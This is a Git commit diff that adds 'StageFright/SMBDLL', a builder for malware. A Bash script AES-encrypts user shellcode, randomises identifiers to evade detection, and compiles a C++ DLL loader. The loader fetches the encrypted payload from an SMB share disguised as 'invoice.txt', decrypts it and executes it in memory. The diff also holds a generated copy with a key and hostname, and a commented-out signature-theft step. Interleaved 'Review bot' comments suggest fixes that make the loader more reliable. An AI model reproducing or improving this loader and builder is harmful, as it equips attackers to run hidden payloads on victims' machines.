
Add files via upload

assume-breach %!s(int64=2) %!d(string=hai) anos
pai
achega
1239c66737

+ 26 - 0
StageFright/StageFright/StageFright/SMBDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
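Review bot: The bare `except:` around the file read catches every exception — a missing argument, a non-existent path, a permission error, even Ctrl-C — and reports all of them as "File argument needed", and the handle returned by `open(...)` is never closed. Narrow it and use a context manager: put `with open(sys.argv[1], "rb") as f: plaintext = f.read()` inside the `try`, catch `except (IndexError, OSError) as exc:` printing the usage line plus `exc`, and call `sys.exit(1)` so the calling shell script (which redirects this script's stdout into `shell.txt`) can see a failure instead of an empty file. The all-zero IV is acceptable here only because a fresh 16-byte `KEY` is drawn from `get_random_bytes` on every run; a one-line comment saying so, `# zero IV is safe only because KEY is fresh per invocation — never hard-code KEY`, would stop the next edit from reusing a fixed key.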

A diferenza do arquivo foi suprimida porque é demasiado grande
+ 0 - 0
StageFright/StageFright/StageFright/SMBDLL/Resources/con.py


BIN=BIN
StageFright/StageFright/StageFright/SMBDLL/Resources/invoice.txt


BIN=BIN
StageFright/StageFright/StageFright/SMBDLL/Resources/malware.dll


+ 252 - 0
StageFright/StageFright/StageFright/SMBDLL/Resources/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL ohztCLrjKceS(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL EpKOpQRlB(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int rABIYwtsiD(char* Random4, unsigned int zHUdE, char* nPincKr, size_t nPincKrlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)nPincKr, (DWORD)nPincKrlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &zHUdE)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char VTOBIBvhNOZy[] =  { 0xa4, 0x49, 0xc1, 0x91, 0xfc, 0x7a, 0x55, 0x44, 0x92, 0x9a, 0xab, 0x5d, 0xb, 0x95, 0x2e, 0xd6 };
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    LPCWSTR szServer = L"Win11Blue";
+    LPCWSTR szFilePath = L"Shared\\invoice.txt";
+
+    PBYTE ymluXTmiPBZPy;
+    SIZE_T ymluXTmiPBZPySize;
+
+    BOOL success = ohztCLrjKceS(szServer, szFilePath, &ymluXTmiPBZPy, &ymluXTmiPBZPySize);
+
+    if (success) {
+        rABIYwtsiD((char*)ymluXTmiPBZPy, ymluXTmiPBZPySize, VTOBIBvhNOZy, sizeof(VTOBIBvhNOZy));
+
+        success = EpKOpQRlB(ymluXTmiPBZPy, ymluXTmiPBZPySize);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = ymluXTmiPBZPySize;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&ymluXTmiPBZPy,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(ymluXTmiPBZPy);
+    }
+
+    return success ? 0 : 1;
+}
+
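Review bot: This file is the script's generated output rather than a source: it is the template with the placeholders already substituted (entry point `Go`, server `Win11Blue`, path `Shared\invoice.txt`, and a concrete 16-byte key in `VTOBIBvhNOZy`), and `SMBDLL.sh` overwrites it with `cp StageFright/SMBDLL/template.cpp StageFright/SMBDLL/Resources/template.cpp` on every run. Committing it together with `invoice.txt` and `malware.dll` puts a built payload, its key and a lab hostname into the repository history; the Resources copy and the two binaries look like candidates for `.gitignore` rather than the commit. The template's defects carry over unchanged: `Go` is declared `void CALLBACK` yet ends with `return success ? 0 : 1;` (it compiles only because the build passes `-fpermissive`), and it calls `LocalFree(ymluXTmiPBZPy)` on a buffer that `NtFreeVirtualMemory` released two statements earlier and that was never obtained from `LocalAlloc`.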

+ 180 - 0
StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh

@@ -0,0 +1,180 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"          
+
+ _____ _                       _   ________  _________  ______ _      _     
+/  ___| |                     | | /  ___|  \/  || ___ \ |  _  \ |    | |    
+\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ / | | | | |    | |    
+ `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \ | | | | |    | |    
+/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ / | |/ /| |____| |____
+\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/  |___/ \_____/\_____/
+                 __/ |                                                      
+                |___/                                                       
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
+echo ""
+read SHAREFOLDER
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Entry Point Function"${clear}
+echo ""
+read ENTRYPOINT
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/SMBDLL/template.cpp StageFright/SMBDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/SMBDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/SMBDLL/conv.py StageFright/SMBDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/SMBDLL/Resources/con.py
+python3 StageFright/SMBDLL/Resources/con.py
+#rm StageFright/SMBDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/SMBDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMBDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/SMBDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/SMBDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/SMBDLL/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/SMBDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/SMBDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/SMBDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/SMBDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/SMBDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/SMBDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/SMBDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/SMBDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+#echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+#echo ""
+#sleep 2
+#python3 StageFright/StageFright/ResourcesSigThief/sigthief.py -i StageFright/StageFright/SMBDLL/Resources/OfficeSetup.exe #-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+#mv signed$MALWARE $MALWARE
+#echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+#echo ""
+
+
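Review bot: The compile step discards the compiler output and never checks its exit status, so the script prints `***Malware Compiled***` whether or not mingw produced `$MALWARE`; wrap it as `if ! x86_64-w64-mingw32-g++ ... ; then echo "compile failed" >&2; exit 1; fi` (or at least `set -e` near the top) and drop the `>/dev/null 2>&1` so errors are visible. `rm shell*` on the next line removes every file in the working directory whose name begins with `shell`, which includes a user's `shellcode.bin` if the script is launched from that directory — name the temporaries explicitly, `rm -f shell.txt shell2.txt shell3.txt shell5.txt`. The answers collected with `read` are spliced unquoted into `sed` expressions (`s/HOSTNAME/$HOSTNAME/g` and the sibling lines), so a `/`, `&` or `\` in a hostname or share name silently corrupts the template; use `read -r` and escape the value or pick a delimiter that cannot appear in it. Note also that `fold -w ${1:-11}` and the other width expressions read the script's first positional argument, so invoking the script with any argument changes every generated identifier length rather than defaulting.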

+ 4 - 0
StageFright/StageFright/StageFright/SMBDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

+ 252 - 0
StageFright/StageFright/StageFright/SMBDLL/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random7[] = KEYVALUE
+
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    LPCWSTR szServer = L"HOSTNAME";
+    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
+
+    PBYTE Random8;
+    SIZE_T Random8Size;
+
+    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
+
+    if (success) {
+        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
+
+        success = Random2(Random8, Random8Size);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = Random8Size;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&Random8,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(Random8);
+    }
+
+    return success ? 0 : 1;
+}
+
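Review bot: In `Random1`, when `ReadFile` fails `bytesRead` is still uninitialized, yet execution falls through and stores it in `*binarySize` alongside the buffer pointer, and the region just obtained from `NtAllocateVirtualMemory` is never released on that path because the caller sees FALSE and skips its cleanup; initialise `DWORD bytesRead = 0;` and free the allocation before returning FALSE. `Random3` returns -1 on any CryptoAPI failure without destroying `hProv`/`hHash`/`hKey`, and `ENTRYPOINT` ignores that return value, so a failed `CryptDecrypt` leaves the still-encrypted bytes in the buffer and they are handed to `Random2` and executed anyway — guard the call with `if (Random3(...) != 0) { /* free Random8 and return */ }`. `ENTRYPOINT` is declared `void CALLBACK` but ends in `return success ? 0 : 1;`, which only compiles because the build script passes `-fpermissive`, and the trailing `LocalFree(Random8)` operates on memory that was never `LocalAlloc`'d and that `NtFreeVirtualMemory` released two statements earlier. Since `CryptDecrypt` is called with `Final` FALSE, no padding is stripped and `Random8Size` is unchanged, so the CBC padding bytes remain at the tail of the executed buffer; that is harmless for position-independent code but deserves a comment.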

Algúns arquivos non se mostraron porque demasiados arquivos cambiaron neste cambio